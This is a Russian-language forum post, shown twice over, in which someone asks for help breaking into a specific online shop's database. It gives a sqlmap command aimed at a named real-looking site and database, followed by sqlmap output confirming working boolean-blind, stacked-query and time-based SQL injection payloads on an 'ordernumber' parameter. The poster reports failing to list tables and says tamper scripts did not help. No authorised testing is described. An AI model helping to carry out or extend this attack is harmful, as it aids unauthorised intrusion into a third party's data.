Приветствую!
sqlmap -u https://www.pulsiva.com/widgets/Variants/?ordernumber=10 -D swprod_pulsiva_com --tables --random-agent --level=5 --risk=3 --no-cast
Parameter: ordernumber (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ordernumber=10' RLIKE (SELECT (CASE WHEN (6591=6591) THEN 10 ELSE 0x28 END))-- IfbF
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: ordernumber=10';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: ordernumber=10' OR SLEEP(5)-- VWoD
---
[19:08:59] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[19:09:03] [CRITICAL] can't use table existence check because of detected invalid results (most likely caused by inability of the used injection to distinguish erroneous results)
[/CODE]
(спачибо кто пытался помочь через лc, тамперы не помогли, других скулей нет)
мб в этих таблицах ничего и нет, не в этом суть. Именно этот сайт для меня будет закрытым гештальтом. Буду очень благодарен за любое содействие.
sqlmap -u https://www.pulsiva.com/widgets/Variants/?ordernumber=10 -D swprod_pulsiva_com --tables --random-agent --level=5 --risk=3 --no-cast
Parameter: ordernumber (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ordernumber=10' RLIKE (SELECT (CASE WHEN (6591=6591) THEN 10 ELSE 0x28 END))-- IfbF
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: ordernumber=10';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: ordernumber=10' OR SLEEP(5)-- VWoD
---
[19:08:59] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[19:09:03] [CRITICAL] can't use table existence check because of detected invalid results (most likely caused by inability of the used injection to distinguish erroneous results)
[/CODE]
(спачибо кто пытался помочь через лc, тамперы не помогли, других скулей нет)
мб в этих таблицах ничего и нет, не в этом суть. Именно этот сайт для меня будет закрытым гештальтом. Буду очень благодарен за любое содействие.
